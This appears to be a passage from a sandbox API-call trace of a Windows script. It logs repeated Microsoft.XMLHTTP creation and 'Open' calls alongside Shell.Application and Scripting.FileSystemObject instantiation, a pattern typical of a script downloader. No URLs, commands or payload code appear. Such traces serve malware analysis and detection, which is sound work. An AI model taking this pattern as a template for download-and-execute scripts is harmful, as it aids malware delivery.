	[0843.733] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0843.733] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0843.733] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0843.733] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0843.734] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0843.734] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0843.734] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0843.734] SysStringLen (param_1=0x0) returned 0x0
	[0843.734] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0843.734] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0843.734] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0843.734] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0843.734] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0843.734] ??2@YAPEAX_K@Z () returned 0x62f350
	[0843.734] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0843.734] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0843.735] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0843.735] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0843.735] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0843.735] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0843.735] SysStringLen (param_1=0x0) returned 0x0
	[0843.735] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0843.738] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0843.738] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0843.739] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0843.739] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0843.739] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0843.739] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0848.237] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0848.237] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0848.237] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0848.239] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0848.239] SysStringLen (param_1=0x0) returned 0x0
	[0848.239] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0848.239] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0848.239] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0848.239] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0848.239] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0848.239] ??2@YAPEAX_K@Z () returned 0x62f310
	[0848.239] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0848.239] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0848.240] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0848.240] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0848.240] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0848.240] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0848.240] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0848.245] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0848.245] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0848.245] SysStringLen (param_1=0x0) returned 0x0
	[0848.245] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0848.246] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0848.246] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0848.248] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0848.248] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0848.249] ??2@YAPEAX_K@Z () returned 0x62f330
	[0848.249] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0848.249] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0848.249] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0848.249] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0848.249] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0848.249] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0848.249] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0848.249] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0848.250] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0848.250] SysStringLen (param_1=0x0) returned 0x0
	[0848.250] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0848.250] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0848.250] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0848.250] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0848.250] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0848.250] ??2@YAPEAX_K@Z () returned 0x62f310
	[0848.250] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0848.250] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0848.250] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0848.250] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0848.250] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0848.251] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0848.251] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0848.251] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0848.251] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0848.251] SysStringLen (param_1=0x0) returned 0x0
	[0848.251] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0848.251] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0848.251] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7520) returned 0x0
	[0848.251] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0848.251] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0848.251] ??2@YAPEAX_K@Z () returned 0x62f330
	[0848.252] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0848.252] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0848.252] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0848.252] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7520) returned 0x0
	[0848.252] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7520) returned 0x3
	[0848.252] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0848.252] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7520, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0848.252] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7520, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0848.252] longjmp () 
	[0848.252] longjmp () 
	[0848.253] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0848.253] SysStringLen (param_1=0x0) returned 0x0
	[0848.253] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
